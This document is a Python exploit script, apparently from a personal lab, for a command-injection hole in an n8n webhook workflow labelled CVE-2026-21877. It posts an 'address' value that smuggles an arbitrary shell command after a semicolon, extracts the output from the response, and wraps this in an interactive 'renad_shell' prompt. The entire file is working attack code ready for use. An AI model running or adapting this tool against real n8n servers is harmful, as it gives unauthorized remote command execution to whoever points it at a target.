import requests
import sys
import html

def attack(target_ip, cmd, use_production=False):
    """
    Sends the malicious POST payload to the custom n8n webhook.
    """
    path = "webhook" if use_production else "webhook-test"
    
    # Path updated to match the custom JSON configuration
    url = f"http://{target_ip}:5678/{path}/renad-secure-gate"
    
    # Command injection payload
    payload = {"address": f"127.0.0.1 >/dev/null 2>&1 ; {cmd}"}
    headers = {"Content-Type": "application/json"}
    
    try:
        r = requests.post(url, json=payload, headers=headers, timeout=20)
        
        if r.status_code == 404:
            if not use_production:
                return "Error 404: Test Node not found. Ensure 'Execute Workflow' is active in n8n."
            else:
                return "Error 404: Production Webhook not found. Ensure the workflow is set to 'Active'."

        response_text = ""
        try:
            data = r.json()
            # Extracting custom status from Renad's JSON config
            status = data.get("status", "")
            if status:
                print(f"[*] Status: {status}") 
            response_text = data.get("data", r.text)
        except:
            response_text = r.text

        if "<pre>" in response_text:
            output = response_text.split("<pre>")[1].split("</pre>")[0]
            output = html.unescape(output.strip())
            
            # Sanitization of ping error messages
            error_msg = "/bin/sh: 1: ping: not found"
            if output.startswith(error_msg):
                output = output.replace(error_msg, "", 1).strip()
                
            return output
        else:
            return f"Command executed, but check n8n response.\nStatus: {r.status_code}"
            
    except Exception as e:
        return f"Connection Error: {str(e)}"

def interactive_shell(target_ip):
    print(f"\n" + "="*45)
    print(f"RENAD'S EXPLOIT LAB - CVE-2026-21877")
    print(f"Target: {target_ip}")
    print(f"="*45 + "\n")
    
    mode_choice = input("Use Production Mode? (Workflow must be 'Active') [y/N]: ").lower()
    is_prod = mode_choice == 'y'
    
    print(f"\n[*] Session Started. Type 'exit' to quit.")
    
    while True:
        try:
            cmd = input("renad_shell$ ")
            if cmd.lower() in ["exit", "quit"]: break
            if not cmd.strip(): continue
            
            result = attack(target_ip, cmd, use_production=is_prod)
            print(result)
            
        except KeyboardInterrupt:
            print("\n[*] Shutting down...")
            break

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 exploit_renad.py <TARGET_IP>")
        sys.exit(1)
        
    target_ip = sys.argv[1]
    interactive_shell(target_ip)